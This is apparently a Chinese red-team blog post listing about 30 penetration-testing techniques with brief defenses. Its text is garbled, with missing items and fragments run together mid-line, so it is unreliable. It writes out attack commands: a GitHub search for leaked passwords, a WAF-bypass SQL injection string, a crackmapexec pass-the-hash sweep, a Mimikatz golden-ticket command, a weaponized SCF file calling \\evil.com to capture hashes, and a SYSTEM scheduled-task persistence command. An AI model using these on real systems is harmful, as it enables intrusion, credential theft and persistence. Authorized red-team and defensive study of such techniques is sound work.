在攻防演练中,红队的首要任务是快速建立有效攻击据点。本文基于项目经验,提炼出30条经过实战验证的打点思路,覆盖信息收集、漏洞利用、权限提升等关键环节,供参考。
* • **案例** :某电商企业通过子公司域名发现未下线的测试环境(test.retail.example.com)
* • **防御** :建立自动化资产盘点系统,每周扫描暴露面
#### 2. **GitHub敏感信息狩猎**
* • **实战技巧** :```
# 使用GitHub API搜索API密钥
requests.get("https://api.github.com/search/code?q=org:Company+filename:.env+password")
{部门缩写}{姓名首字母}{入职年份}@example.comdig CNAME old-app.example.com
* • **案例** :某物流公司停用系统未删除云解析记录
* • **防御** :资产下线自动化清理流程
#### 7. **OAuth令牌劫持**
* • **漏洞利用** :
截获未校验`state`参数的OAuth回调请求
* • **工具** :修改Burp OAuth插件实现自动化
* • **防护** :强制PKCE校验+state参数绑定会话
#### 8. **API未授权访问**
* • **高频漏洞点** :```
GET /api/v1/users?page=1&size=100 # 用户信息泄露
POST /actuator/refresh # Spring Boot配置重载
s3.{region}.amazonaws.comaws s3 ls s3://bucket-name --no-sign-request
* • **利用** :通过开放转发发送钓鱼邮件
* • **防护** :禁用SMTP匿名中继
#### 11. **VPN漏洞链利用**
* • **经典组合拳** :
CVE-2019-11510(Pulse VPN)→ 读取/etc/passwd → 密码破解
* • **防御** :VPN设备纳入高危漏洞快速响应机制
#### 12. **WAF绕过实战**
* • **SQL注入绕过** :```
/*!50000SELECT*/1,2,3FROM users # MySQL内联注释
* • **工具** :SweetPotato提权套件
* • **防御** :禁用非必要服务权限
#### 15. **Linux sudo滥用**
* • **检测命令** :```
sudo -l | grep -E 'nmap|vim|find|python'
* • **加固** :最小化sudo权限
#### 16. **Kerberos委派攻击**
* • **攻击流程** :
1. 1. 使用BloodHound识别约束委派
2. 2. 通过s4u2self获取目标服务票据
* • **工具** :Rubeus自动化利用
* • **防护** :禁用非必要委派
#### 17. **云角色权限提升**
* • **AWS场景** :```
{
"Effect":"Allow",
"Action":"iam:PassRole",
"Resource":"*"// 高风险配置
}
* • **防护** :删除危险存储过程
#### 19. **计划任务劫持**
* • **Windows检测** :```
Get-ScheduledTask | Where State -eq"Ready"
* • **工具链** :Responder + ntlmrelayx.py
* • **防御** :启用SMB签名
#### 22. **Pass-the-Hash实战**
* • **命令** :```
crackmapexec smb 10.0.0.0/24 -u administrator -H <NTLM_HASH>
kerberos::golden
* • **检测** :Sysmon事件ID 19监控
#### 25. **SCF文件劫持**
* • **武器化文件** :```
[Shell]
Command=2
IconFile=\\evil.com\share\pentestlab.ico
* • **加固** :禁用Point and Print
### 五、权限维持技巧
#### 27. **隐藏计划任务**
* • **创建命令** :```
schtasks /create /tn "UpdateService" /tr "C:\malware.exe" /sc hourly /ru SYSTEM /f
F值克隆账户ts::sessions%AppData%\Microsoft\Word\STARTUP\
* • **防护** :函数代码完整性检查
### 红队行动备忘录
**三条铁律** :
1. 1. 所有操作必须获得书面授权
2. 2. 数据渗出需进行匿名化处理
3. 3. 清理所有攻击痕迹(包括内存驻留)
**典型失败案例** :
某红队因未清除Mimikatz内存dump被蓝队溯源,导致攻击路径完全暴露
攻防本质是成本对抗,红队的价值在于帮助企业以最小代价发现致命弱点。演练结束才是真正安全建设的开始。